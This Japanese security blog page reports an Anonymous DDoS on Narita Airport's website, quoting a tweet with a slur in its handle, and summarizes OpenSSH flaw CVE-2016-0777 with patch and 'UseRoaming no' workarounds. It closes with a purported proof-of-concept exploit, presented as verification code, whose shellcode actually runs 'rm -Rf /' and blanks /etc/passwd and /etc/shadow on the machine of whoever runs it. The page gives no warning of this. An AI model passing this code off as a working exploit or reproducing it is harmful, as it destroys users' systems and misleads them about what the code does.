成田空港HPにサイバー攻撃アノニマス犯行声明

キーワード：アノニマス、anonymous、OpkillingBay、反イルカ漁

概要

成田空港の公式ホームページ(http://www.narita-airport.jp/)が、2017年1月22日夜から23日にかけて閲覧しずらい状態になった。アノニマスからサーバに対して大量のデータを送り続けて閲覧不能にするDDoS攻撃を受けたとみられる。成田空港の飛行機の運航などに影響は出ていない。

成田国際空港会社（NAA)によると、警察からアノニマス(Anonymous)がツイッター上に犯行声明を出しているとの連絡を受けたそうです。アノニマスは以前より和歌山県太地町で行われているイルカ漁に対する抗議として#OpKillingBayというオペレーションを行っており、日本のイルカ漁関連Webサイトなどにたびたびサイバー攻撃を仕掛けている。サイバー攻撃のターゲットとして、イルカ漁に全く関連しないKADOKAWAが運営する「ASCII.jp」(http://ascii.jp/)などのWebサイトも多数狙われており、攻撃対象が不明確となっている。今回はシーシェパード活動家アーロンチャールズ（Aaron Charles)が成田空港で入国を拒否されたことに対する抗議の可能性が考えられる。

アノニマス(Anonymous)による成田空港公式ホームページに対するDDoS攻撃に関連するツイート

#Anonymous https://t.co/aWJ7S1fdl4 #TangoDown We are #OpKillingBay We support Ric and demand his release now! pic.twitter.com/qcTf8KSlsW
— Anonymous (@_RektFaggot_) 2016, 1月 22

成田空港の公式ホームページは、昨年 2015年10月にも今回と同様アノニマスよりDDoSサイバー攻撃を受けてHPが閲覧しずらい状態になっていました。

SSHクライアントに秘密鍵が漏洩する可能性のある脆弱性(CVE-2016-0777)のまとめ

1. 概要

OpenSSH でドキュメント化されていない実験的なローミング(roaming)機能（切断時に自動で再接続する機能）に脆弱性が見つかりました。この機能は OpenSSH 5.4 から追加されているため、OpenSSH 5.3 以前のバージョンは影響しません。また、コンパイル時もしくは設定により、明示的に無効にしない限り、有効になっています。この脆弱性を攻撃する悪意あるサーバと通信をすると、メモリ内容が送信されてしまい秘密鍵などの重要な情報が漏えいしてしまう可能性があります。

既に怪しいサーバ、信頼できないサーバに SSH で接続したことがある場合、秘密鍵などの情報が洩れている可能性があります。SSH の秘密鍵・公開鍵を再作成して入れ替えるなどの対応を行った方が良いでしょう。

‘Important SSH patch coming soon’ – MARC
http://marc.info/?l=openbsd-misc&m=145278077920530&w=2

OpenSSH: client bug CVE-2016-0777
http://undeadly.org/cgi?action=article&sid=20160114142733

2. 影響を受けるバージョン

OpenSSH Client 5.4 以降のバージョン（OpenSSH Client 5.4 ～ 7.1）

ただし、OpenSSH 6.6 は影響を受けないそうです。

3. 影響を受けるバージョンか確認する方法

> ssh –V

4. 対策

CVE-2016-0777 の脆弱性が修正（roaming機能がオフ）されたバージョンが公開されています。

Announce: Portable OpenSSH 7.1p2 released
https://lists.mindrot.org/pipermail/openssh-unix-dev/2016-January/034680.html

5. 暫定対策

5.1 OpenSSH クライアントの設定(ssh_config)ファイルに、ローミング機能を無効にする設定を追加する。

echo “UseRoaming no” >> /etc/ssh/ssh_config

5.2 各ユーザの OpenSSH クライアントの設定ファイルに、ローミング機能を無効にする設定を追加する。

echo “UseRoaming no” >> ~/.ssh/config

5.3 OpenSSH で接続する際にローミング機能をオフにするオプションをつけて実行する。

-oUseRoaming=no

6. 検証コード

脆弱性を検証するためのコンセプトコード(PoC)が公開されています。

CVE-2016-0777 roaming openssh exploit http://pastebin.com/T2zjAdZ5

/*

Exploit : openssh roaming Exploit -- CVE-2016-0777

Author: : KingCope

Compile : gcc -W sploit.c -o sploit

Usage: : ./sploit HOST IP

Thanks : openBSD, congratz, guys

*/

…

unsigned char shellcode[] =

"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"

"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"

"\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"

"\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"

"\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"

"\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"

"\xcd\x80";

…